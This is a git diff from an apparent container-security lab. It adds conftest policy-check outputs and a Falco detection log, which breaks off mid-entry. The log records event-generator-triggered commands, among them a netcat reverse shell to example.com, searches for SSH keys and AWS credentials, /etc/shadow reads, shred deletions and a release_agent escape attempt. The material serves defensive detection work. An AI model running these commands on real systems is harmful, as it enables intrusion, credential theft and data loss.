diff --git a/labs/lab9/analysis/conftest-compose.txt b/labs/lab9/analysis/conftest-compose.txt
new file mode 100644
index 00000000..ca9d30b8
--- /dev/null
+++ b/labs/lab9/analysis/conftest-compose.txt
@@ -0,0 +1,2 @@
+
+15 tests, 15 passed, 0 warnings, 0 failures, 0 exceptions
diff --git a/labs/lab9/analysis/conftest-hardened.txt b/labs/lab9/analysis/conftest-hardened.txt
new file mode 100644
index 00000000..9da25fba
--- /dev/null
+++ b/labs/lab9/analysis/conftest-hardened.txt
@@ -0,0 +1,2 @@
+
+30 tests, 30 passed, 0 warnings, 0 failures, 0 exceptions
diff --git a/labs/lab9/analysis/conftest-unhardened.txt b/labs/lab9/analysis/conftest-unhardened.txt
new file mode 100644
index 00000000..ff1049f3
--- /dev/null
+++ b/labs/lab9/analysis/conftest-unhardened.txt
@@ -0,0 +1,12 @@
+WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define livenessProbe
+WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define readinessProbe
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.cpu
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.memory
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.cpu
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.memory
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set allowPrivilegeEscalation: false
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set readOnlyRootFilesystem: true
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set runAsNonRoot: true
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" uses disallowed :latest tag
+
+30 tests, 20 passed, 2 warnings, 8 failures, 0 exceptions
diff --git a/labs/lab9/falco/logs/falco.log b/labs/lab9/falco/logs/falco.log
new file mode 100644
index 00000000..0a1ef718
--- /dev/null
+++ b/labs/lab9/falco/logs/falco.log
@@ -0,0 +1,31 @@ +{"hostname":"5238b209792c","output":"2025-11-07T18:16:23.209907608+0000: Notice A shell was spawned in a container with an attached terminal | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=containerd-shim command=sh -lc echo hello-from-shell terminal=34816 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c1209dd4c6e6 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c1209dd4c6e6","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539383209907608,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -lc echo hello-from-shell","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"containerd-shim","proc.tty":34816,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Terminal shell in container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","shell"],"time":"2025-11-07T18:16:23.209907608Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:16:34.172443196+0000: Warning Falco Custom: File write in /usr/local/bin (container= user=root file=/usr/local/bin/drift.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=c1209dd4c6e6 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c1209dd4c6e6","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1762539394172443196,"fd.name":"/usr/local/bin/drift.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under 
UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2025-11-07T18:16:34.172443196Z"} +Events detected: 2 +Rule counts by severity: + WARNING: 1 + NOTICE: 1 +Triggered rules by rule name: + Terminal shell in container: 1 + Write Binary Under UsrLocalBin: 1 +{"hostname":"5238b209792c","output":"2025-11-07T18:16:50.778228010+0000: Warning Falco Custom: File write in /usr/local/bin (container= user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=c1209dd4c6e6 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c1209dd4c6e6","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1762539410778228010,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2025-11-07T18:16:50.778228010Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:16:59.228352305+0000: Informational System user ran an interactive command | evt_type=execve user=daemon user_uid=2 user_loginuid=-1 process=login proc_exepath=/bin/busybox parent=event-generator command=login terminal=0 exe_flags=EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_LOWER_LAYER","evt.time.iso8601":1762539419228352305,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"login","proc.exepath":"/bin/busybox","proc.name":"login","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"daemon","user.uid":2},"priority":"Informational","rule":"System user interactive","source":"syscall","tags":["NIST_800-53_AC-2","T1059","container","host","maturity_stable","mitre_execution","users"],"time":"2025-11-07T18:16:59.228352305Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:16:59.336567222+0000: Warning Grep private keys or passwords activities found | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname id_rsa terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539419336567222,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname id_rsa","proc.exepath":"/bin/busybox","proc.name":"find","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Search Private Keys or Passwords","source":"syscall","tags":["T1552.001","container","filesystem","host","maturity_stable","mitre_credential_access","process"],"time":"2025-11-07T18:16:59.336567222Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:05.604066767+0000: Warning Sensitive file opened for reading by trusted program after startup | file=/etc/shadow 
pcmdline=event-generator run syscall gparent=containerd-shim ggparent=init gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=httpd proc_exepath=/bin/event-generator parent=event-generator command=httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539425604066767,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.aname[3]":"init","proc.aname[4]":null,"proc.cmdline":"httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s","proc.exepath":"/bin/event-generator","proc.name":"httpd","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file trusted after startup","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-11-07T18:17:05.604066767Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:05.913951600+0000: Critical Fileless execution via memfd_create | container_start_ts=1762539418844244304 proc_cwd=/ evt_res=SUCCESS proc_sname=event-generator gparent=containerd-shim evt_type=execve user=root user_uid=0 user_loginuid=-1 process=3 proc_exepath=memfd:program parent=event-generator command=3 run helper.DoNothing terminal=0 exe_flags=EXE_WRITABLE|EXE_FROM_MEMFD container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"container.start_ts":1762539418844244304,"evt.arg.flags":"EXE_WRITABLE|EXE_FROM_MEMFD","evt.res":"SUCCESS","evt.time.iso8601":1762539425913951600,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"3 run helper.DoNothing","proc.cwd":"/","proc.exepath":"memfd:program","proc.name":"3","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Fileless execution via memfd_create","source":"syscall","tags":["T1620","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2025-11-07T18:17:05.913951600Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.271531892+0000: Warning Symlinks created over sensitive files | target=/etc linkpath=/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2606254030/etc_link evt_type=symlinkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2606254030/etc_link terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.linkpath":"/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2606254030/etc_link","evt.arg.target":"/etc","evt.time.iso8601":1762539426271531892,"evt.type":"symlinkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -s /etc 
/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2606254030/etc_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Symlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-11-07T18:17:06.271531892Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.374162559+0000: Warning Log files were tampered | file=/tmp/falco-event-generator-syscall-ClearLogActivities-1105780433/syslog evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539426374162559,"evt.type":"openat","fd.name":"/tmp/falco-event-generator-syscall-ClearLogActivities-1105780433/syslog","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Clear Log Activities","source":"syscall","tags":["NIST_800-53_AU-10","T1070","container","filesystem","host","maturity_stable","mitre_defense_evasion"],"time":"2025-11-07T18:17:06.374162559Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.477013309+0000: Notice Detected potential PTRACE_TRACEME anti-debug attempt | proc_pcmdline=event-generator run syscall evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=event-generator 
command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539426477013309,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"PTRACE anti-debug attempt","source":"syscall","tags":["T1622","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2025-11-07T18:17:06.477013309Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.579708225+0000: Warning Read monitored file via directory traversal | file=/etc/shadow fileraw=/etc/../etc/../etc/shadow gparent=init ggparent= gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539426579708225,"evt.type":"openat","fd.name":"/etc/shadow","fd.nameraw":"/etc/../etc/../etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"init","proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Directory traversal monitored file 
read","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-11-07T18:17:06.579708225Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.681019767+0000: Warning Sensitive file opened for reading by non-trusted program | file=/etc/shadow gparent=init ggparent= gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539426681019767,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"init","proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-11-07T18:17:06.681019767Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.790433725+0000: Warning Hardlinks created over sensitive files | target=/etc/shadow linkpath=/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-430131139/shadow_link evt_type=linkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-430131139/shadow_link terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.newpath":"/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-430131139/shadow_link","evt.arg.oldpath":"/etc/shadow","evt.time.iso8601":1762539426790433725,"evt.type":"linkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-430131139/shadow_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Hardlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-11-07T18:17:06.790433725Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.896301392+0000: Warning Detected ptrace PTRACE_ATTACH attempt | proc_pcmdline=containerd-shim -namespace moby -id f66ca412350581408284a7736ffedb48569c506eb586f8a997497b17244c4674 -address /run/containerd/containerd.sock evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539426896301392,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"containerd-shim -namespace moby -id f66ca412350581408284a7736ffedb48569c506eb586f8a997497b17244c4674 -address 
/run/containerd/containerd.sock","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"PTRACE attached to process","source":"syscall","tags":["T1055.008","container","host","maturity_stable","mitre_privilege_escalation","process"],"time":"2025-11-07T18:17:06.896301392Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:06.999811184+0000: Warning Bulk data has been removed from disk | file= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=shred proc_exepath=/bin/busybox parent=event-generator command=shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-2780101379 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539426999811184,"evt.type":"execve","fd.name":null,"k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-2780101379","proc.exepath":"/bin/busybox","proc.name":"shred","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Remove Bulk Data from Disk","source":"syscall","tags":["T1485","container","filesystem","host","maturity_stable","mitre_impact","process"],"time":"2025-11-07T18:17:06.999811184Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:07.110651809+0000: Critical Detect an attempt to exploit a container escape using release_agent file | file=/release_agent cap_effective=CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER 
CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE evt_type=openat user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c echo 'hello world' > release_agent terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539427110651809,"evt.type":"openat","fd.name":"/release_agent","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c echo 'hello world' > release_agent","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"event-generator","proc.tty":0,"thread.cap_effective":"CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Detect release_agent File Container Escapes","source":"syscall","tags":["T1611","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2025-11-07T18:17:07.110651809Z"} 
+{"hostname":"5238b209792c","output":"2025-11-07T18:17:07.218671851+0000: Critical Executing binary not part of base image | proc_exe=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-urWKNW proc_sname=event-generator gparent=containerd-shim proc_exe_ino_ctime=1762539427214632004 proc_exe_ino_mtime=1762539427214632004 proc_exe_ino_ctime_duration_proc_start=3662263 proc_cwd=/ container_start_ts=1762539418844244304 evt_type=execve user=root user_uid=0 user_loginuid=-1 process=falco-event-gen proc_exepath=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-urWKNW parent=event-generator command=falco-event-gen terminal=0 exe_flags=EXE_WRITABLE|EXE_UPPER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"container.start_ts":1762539418844244304,"evt.arg.flags":"EXE_WRITABLE|EXE_UPPER_LAYER","evt.time.iso8601":1762539427218671851,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"falco-event-gen","proc.cwd":"/","proc.exe":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-urWKNW","proc.exe_ino.ctime":1762539427214632004,"proc.exe_ino.ctime_duration_proc_start":3662263,"proc.exe_ino.mtime":1762539427214632004,"proc.exepath":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-urWKNW","proc.name":"falco-event-gen","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Drop and execute new binary in container","source":"syscall","tags":["PCI_DSS_11.5.1","TA0003","container","maturity_stable","mitre_persistence","process"],"time":"2025-11-07T18:17:07.218671851Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:07.323949559+0000: Warning 
Netcat runs inside container that allows remote code execution | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=nc proc_exepath=/usr/bin/nc parent=event-generator command=nc -e /bin/sh example.com 22 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539427323949559,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"nc -e /bin/sh example.com 22","proc.exepath":"/usr/bin/nc","proc.name":"nc","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Netcat Remote Code Execution in Container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","network","process"],"time":"2025-11-07T18:17:07.323949559Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:07.763578018+0000: Notice Disallowed SSH Connection | connection=172.17.0.4:33294->23.215.0.138:443 lport=443 rport=33294 fd_type=ipv4 fd_proto=tcp evt_type=connect user=root user_uid=0 user_loginuid=-1 process=ssh proc_exepath=/usr/bin/ssh parent=event-generator command=ssh user@example.com -p 443 terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.time.iso8601":1762539427763578018,"evt.type":"connect","fd.l4proto":"tcp","fd.lport":443,"fd.name":"172.17.0.4:33294->23.215.0.138:443","fd.rport":33294,"fd.type":"ipv4","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ssh user@example.com -p 
443","proc.exepath":"/usr/bin/ssh","proc.name":"ssh","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Disallowed SSH Connection Non Standard Port","source":"syscall","tags":["T1059","container","host","maturity_stable","mitre_execution","network","process"],"time":"2025-11-07T18:17:07.763578018Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:08.036413309+0000: Warning Detected AWS credentials search activity | proc_pcmdline=event-generator run syscall proc_cwd=/ group_gid=0 group_name=root user_loginname= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname .aws/credentials terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539428036413309,"evt.type":"execve","group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname .aws/credentials","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"find","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Find AWS Credentials","source":"syscall","tags":["T1552","aws","container","host","maturity_stable","mitre_credential_access","process"],"time":"2025-11-07T18:17:08.036413309Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:08.271321893+0000: Notice Shell spawned by untrusted binary | parent_exe=/tmp/falco-event-generator-syscall-spawned-123866185/httpd parent_exepath=/bin/event-generator pcmdline=httpd --loglevel info run 
^helper.RunShell$ gparent=event-generator ggparent=containerd-shim aname[4]=init aname[5]= aname[6]= aname[7]= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=httpd command=sh -c ls > /dev/null terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1762539428271321893,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"event-generator","proc.aname[3]":"containerd-shim","proc.aname[4]":"init","proc.aname[5]":null,"proc.aname[6]":null,"proc.aname[7]":null,"proc.cmdline":"sh -c ls > /dev/null","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"httpd --loglevel info run ^helper.RunShell$","proc.pexe":"/tmp/falco-event-generator-syscall-spawned-123866185/httpd","proc.pexepath":"/bin/event-generator","proc.pname":"httpd","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Run shell untrusted","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution","process","shell"],"time":"2025-11-07T18:17:08.271321893Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:08.378788643+0000: Notice Packet socket was created in a container | socket_info=fd=6() domain=17(AF_PACKET) type=3 proto=3 connection= lport= rport= fd_type= fd_proto= evt_type=socket user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= 
